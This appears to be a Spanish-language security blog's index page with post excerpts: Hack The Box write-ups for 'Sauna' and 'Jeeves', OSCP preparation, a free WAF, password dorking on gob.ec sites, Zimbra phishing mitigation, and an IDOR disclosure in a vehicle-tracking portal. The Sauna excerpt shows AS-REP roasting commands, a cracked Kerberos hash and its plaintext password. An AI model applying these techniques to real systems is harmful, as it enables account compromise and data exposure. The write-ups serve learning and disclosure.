Writeup Sauna Hack the Box

Resumen Aprovechando que la página contenía información del staff de trabajadores se pudo generar una lista de usuarios válidos, con esto se obtuvo un acceso sin privilegios elevados, sin embargo tenía un soporte legacy esto permitió usar la repetición NTLM (ntlmrelay) se pudo obtener credenciales privilegiadas. Punto de Apoyo Enumeramos de manera convencional Ver la página y escribir los nombres del equipo en un archivo txt. Usar este script para generar posibles usuarios del active directory. https://github.com/Sh4rpe/UNCreator/blob/master/README.md Obtener Usuario GetNPUsers.py EGOTISTICALBANK/ -usersfile ../../../hackthebox/sauna/users.txt  -no-pass -dc-ip sauna.htb -format hashcat -outputfile fsmith.hash hashcat -m 18200 –force -a 0 fsmith.hash ../../wordlist/rockyou.txt  $krb5asrep$23$FSmith@EGOTISTICALBANK:0bd43c2e6f733ab7df687d0e70dc037b$ebd9c1d21a76485fa5419ff349cb692699b4cc1700dfd60efdd34d2c224f7d9194a46c377ce9d9492f66426d995783e3b49c2fc857bdc278be0eb150295b767ccaaa560833b4caee4486529467a76a39b5d749cbb5a64fd63cfc67269bea4bea8f44e5fcfe3b6d615d5ff36bc378b29fc99d5f389899f0818ef145a17f8a2ba93962b07269dc3e865da6555b3a435573f96800fd80435adb5acc13748addc4270bd14389ac09bba0a5e5057e221800ae10a32723e415b8d756f99e492fbe68efe0c1d620a06af8b71364ff2eda84875daf5e5c2e809bc44e5c1298f7628f0faeb7b257d5feba44cd68f667e55169f801fc12ef01f0c3a5e7b4:Thestrokes23 evil-winrm…

Writeup Jeeves Hack the Box

Iniciamos añadiendo una entrada en el archivo /etc/hosts para esta máquina. sudo echo «10.10.10.63 jeeves.htb» >> /etc/hosts Iniciamos con un nmap básico, con las siguientes opciones. nmap -p- –open -T5 -v -d –min-rate 1000 jeeves.htb -oG ports.txt -p-: Escaneo de los 65535 puertos. –open: Solo muestra los puertos abiertos. -T5: La velocidad más alta de escaneo. -v: Para que muestre el proceso en la salida en consola. (verbose) -d: establece en 1 el nivel de depuración. –min-rate 1000: Mínimo 1000 paquetes por segundo. -oG: Reporte en formato amigable con el comando GREP Para mayor detalle se puede acceder a este…

Caminando a obtener la Certificación OSCP

Como es conocido en el mundo de la Ciberseguridad, la certificación OSCP es una de la más apreciadas, ya que para conseguirla hay que aprobar un examen práctico, con una duración de 24 horas. Para terminar con un resultado exitoso y como parte de la preparación me he propuesto describir como voy caminando a obtener la certificación OSCP. Todos los artículos relacionados con el tema se publicarán aquí y se hará uno nuevo semanalmente. Que es OSCP Es una certificación de la empresa Offensive Security. Es la más apreciada en lo que se refiere a penetration testing. Para obtenerla es…

Implementando un Web Application Firewall costo 0 Efectividad Alta

Todos los que en algún momento hemos trabajado en temas de seguridad informática sabemos lo importante de contar con un Firewall de Aplicaciones Web (WAF por sus siglas en inglés), sin embargo en muchas empresas o entidades públicas el presupuesto es limitado al momento de adquirir equipamiento de seguridad.

La información no Pública que Publican algunos sitios de GOB.EC

Es bastante interesante lo que se puede hacer con un buscador y unas cuantas malas configuraciones en los servidores web de varias instituciones que usan en su dominio el subfijo GOB.EC. Con una búsqueda tan simple como «site:gob.ec password» se llegan a obtener resultados como estos: Entiendo que como está publicado he indexado en un buscador, la información es Pública, es por esto que no cubro los datos que a mi criterio son críticos, pero al parecer para la institución no lo son. Otros hallazgos importantes son, que parece que hay varios sitios de gobiernos sobretodo descentralizados que les usan…

Mitigar las consecuencias del robo de credenciales en Zimbra

En la actualidad en las entidades públicas del Ecuador es masivo el uso del servicio de correo usando Zimbra generalmente la versión de la comunidad. En la experiencia que he tenido en dos entidades públicas puedo asegurar que aún cuando se han desarrollado actividades como informar al usuario, charlas, correos, boletines, aún existen los usuarios que entregan sus credenciales al intento más básico de phishing. Lo que ha ocasionado esto es que el top de los incidentes de seguridad se relacionen con robo de credenciales de correo. De acuerdo al comportamiento del incidente, se ha identificado el siguiente proceso, envían…

Fallo de seguridad de SHERLOC permite conocer la ubicación de los vehículos de cualquiera de sus clientes

A finales de mayo, y considerando que mi contrato terminaba a mediados de junio, ingresé al sitio web de Sherloc, la empresa que me obligaron a contratar cuando compré mi vehículo. En este portal se puede ver la localización del vehículo, además de datos como número de placa, motor, chasis, modelo, marca, color y otros detalles relevantes del vehículo. Cuando contraté este servicio, se me proporcionó un usuario compuesto de 6 dígitos. Al ingresar al portal de clientes, noté que este número asignado como usuario estaba como parámetro en la URL de la aplicación. La curiosidad me llevó a cambiar…